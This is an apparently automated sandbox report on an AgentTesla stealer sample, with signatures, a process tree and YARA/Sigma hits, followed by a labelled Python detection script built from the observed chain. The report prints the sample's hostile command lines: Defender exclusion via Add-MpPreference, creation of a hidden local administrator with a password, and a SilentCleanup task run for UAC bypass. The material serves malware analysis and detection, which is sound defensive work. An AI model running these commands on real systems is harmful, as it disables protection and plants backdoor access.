Windows Analysis Report #NEW ORDER FOR JANUARY 2022.exe

Overview

General Information

Sample Name: #NEW ORDER FOR JANUARY 2022.exe
Analysis ID: 553020
MD5: 8b974d65bf7e334d75f57027821ac628
SHA1: f3ccc2d15a771715e6653d470f955f7095e3cd17
SHA256: c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
Tags: agenttesla, exe

Detection

Family: AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Adds a new user with administrator rights
Injects a PE file into a foreign process
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Sigma detected: Hurricane Panda Activity
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Sigma detected: Net.exe User Account Creation
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • #NEW ORDER FOR JANUARY 2022.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 3604 cmdline: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5692 cmdline: C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 5664 cmdline: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5344 cmdline: C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • net.exe (PID: 6868 cmdline: "C:\Windows\system32\net.exe" localgroup users "user" /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 4864 cmdline: C:\Windows\system32\net1 localgroup users "user" /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • net.exe (PID: 6908 cmdline: "C:\Windows\system32\net.exe" localgroup administrators "user" /del MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 2628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 7040 cmdline: C:\Windows\system32\net1 localgroup administrators "user" /del MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • schtasks.exe (PID: 6240 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComSvcConfig.exe (PID: 4564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe MD5: 2778AE0EB674B74FF8028BF4E51F1DF5)
    • aspnet_regbrowsers.exe (PID: 7068 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4876 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_regbrowsers.exe (PID: 4588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
  • svchost.exe (PID: 1004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6712 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AddInProcess32.exe (PID: 5200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
    • ilasm.exe (PID: 6684 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe MD5: 432EAF71554C788169F9E8258BB9FF60)
    • AddInProcess32.exe (PID: 6748 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
  • #NEW ORDER FOR JANUARY 2022.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • jsc.exe (PID: 6512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)
  • svchost.exe (PID: 6916 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 1424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CasPol.exe (PID: 5344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 5692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • RegSvcs.exe (PID: 4204 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(156 entries in the full report; first 5 shown)

Unpacked PEs

Source | Rule | Description | Author
0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
32.2.svchost.exe.470db20.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
32.2.svchost.exe.470db20.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
31.0.aspnet_regbrowsers.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(73 entries in the full report; first 5 shown)

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" , ParentImage: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, ParentProcessId: 6852, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4204

Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, ProcessId: 6684

Sigma detected: Hurricane Panda Activity
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, CommandLine: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, ProcessId: 5664

Sigma detected: Net.exe User Account Creation
Source: Process started | Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) | Data: Command: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, ProcessId: 3604

Sigma detected: Net.exe Execution
Source: Process started | Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) | Data: Command: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, ProcessId: 3604

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" , ParentImage: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, ParentProcessId: 6852, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4204

Sigma detected: Group Modification Logging
Source: Event Logs | Author: Alexandr Yampolskyi, SOC Prime | Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -

Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, ProcessId: 6684

Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132866083503977576.6684.DefaultAppDomain.powershell
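The process tree and the Sigma hits above describe one chain: a PowerShell Defender exclusion for the sample, `net user ADMIN~1 ... /add` followed by `net localgroup administrators ADMIN~1 /add`, an on-demand `schtasks /run` of the SilentCleanup task, a copy of the sample dropped as svchost.exe under C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\, and argument-less .NET Framework utilities (RegSvcs.exe, aspnet_regbrowsers.exe, AddInProcess32.exe, CasPol.exe, ilasm.exe, jsc.exe, ComSvcConfig.exe) started as injection hosts. The following is an added example, not part of the Joe Sandbox report, that encodes those rules as process-creation checks and rolls the hits up per process chain. The events are constructed from the report's command lines in Sysmon Event ID 1 / Security 4688 style; the parent of the dropped svchost.exe, the rule weights and the ATT&CK annotations in the comments are this example's own assumptions.

```python
"""Process-creation rules for the chain shown in the report's process tree.

EVENTS is CONSTRUCTED from the report's command lines (not exported telemetry);
the parent of the dropped svchost.exe and the weights are assumptions.
"""
import re
from collections import defaultdict

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# .NET Framework utilities that the sample starts with no arguments as injection hosts
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "aspnet_regbrowsers.exe", "addinprocess32.exe",
                "caspol.exe", "ilasm.exe", "jsc.exe", "comsvcconfig.exe", "msbuild.exe"}
WEIGHTS = {"defender_exclusion": 40, "local_user_creation": 30, "local_admin_group_add": 40,
           "silentcleanup_task_run": 30, "svchost_masquerade": 50, "dotnet_sacrificial_host": 20}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _args(cmdline):
    """Tokenise a Windows command line (quoted or bare image first) and drop the image."""
    toks = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t.strip('"').lower() for t in toks[1:]]


def evaluate(ev):
    """Return the names of the rules one process-creation event matches."""
    img, path, args = _basename(ev["Image"]), ev["Image"].lower(), _args(ev["CommandLine"])
    hits = []
    if img in ("powershell.exe", "pwsh.exe") and "add-mppreference" in args and "-exclusionpath" in args:
        hits.append("defender_exclusion")          # T1562.001
    if img in ("net.exe", "net1.exe") and args[:1] == ["user"] and "/add" in args:
        hits.append("local_user_creation")         # T1136.001
    if img in ("net.exe", "net1.exe") and args[:1] == ["localgroup"] and "administrators" in args[1:2] and "/add" in args:
        hits.append("local_admin_group_add")       # T1098
    if img == "schtasks.exe" and "/run" in args and any(a.endswith("\\silentcleanup") for a in args):
        hits.append("silentcleanup_task_run")      # T1548.002: manual run of the auto-elevating task
    if img == "svchost.exe" and not path.startswith(SYSTEM_DIRS):
        hits.append("svchost_masquerade")          # T1036.005
    if img in DOTNET_HOSTS and not args:
        hits.append("dotnet_sacrificial_host")     # T1055 candidate; noisy on developer machines
    return hits


def triage(events):
    """Roll every hit up to the top-most process present in the event set."""
    parent_of = {e["ProcessId"]: e["ParentProcessId"] for e in events}

    def root(pid):
        while parent_of.get(pid) in parent_of:
            pid = parent_of[pid]
        return pid

    findings = defaultdict(set)
    for e in events:
        for rule in evaluate(e):
            findings[root(e["ProcessId"])].add(rule)
    return {pid: sorted(rules) for pid, rules in findings.items()}


def score(rules):
    return min(100, sum(WEIGHTS[r] for r in rules))


def _ev(pid, ppid, image, parent, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent, "CommandLine": cmdline}


MALWARE = r"C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
DROPPED = r"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\SysWOW64\net.exe"
EVENTS = [  # constructed from the report's command lines; PIDs as in the report where unique
    _ev(6588, 1000, MALWARE, r"C:\Windows\explorer.exe", f'"{MALWARE}"'),
    _ev(6684, 6588, PS, MALWARE, f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "{MALWARE}" -Force'),
    _ev(3604, 6588, NET, MALWARE, r'"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add'),
    _ev(5664, 6588, NET, MALWARE, r'"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add'),
    _ev(6240, 6588, r"C:\Windows\SysWOW64\schtasks.exe", MALWARE,
        r'"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I'),
    _ev(4876, 7136, DROPPED, r"C:\Windows\System32\svchost.exe", f'"{DROPPED}"'),  # parent: assumption
    _ev(4588, 4876, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe", DROPPED,
        r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"),
    _ev(2222, 1000, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
        r"C:\Windows\System32\svchost.exe -k netsvcs -p"),  # benign control event
]

if __name__ == "__main__":
    for pid, rules in triage(EVENTS).items():
        print(f"root PID {pid}: score {score(rules)} -> {', '.join(rules)}")
```

The per-event rules are deliberately simple; the value is in the roll-up. A Defender exclusion or a `net user /add` is noisy on its own, but one chain raising both plus an admin-group add and a SilentCleanup run, while a svchost.exe outside System32 spawns argument-less aspnet_regbrowsers.exe, is exactly the shape of this report.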

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: #NEW ORDER FOR JANUARY 2022.exe | ReversingLabs: Detection: 18%
Multi AV Scanner detection for dropped file
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | ReversingLabs: Detection: 18%
Source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8

Exploits:

Yara detected UAC Bypass using CMSTP
Source: Yara match | File source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000003.795978697.0000000005A52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000003.850266618.0000000006E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
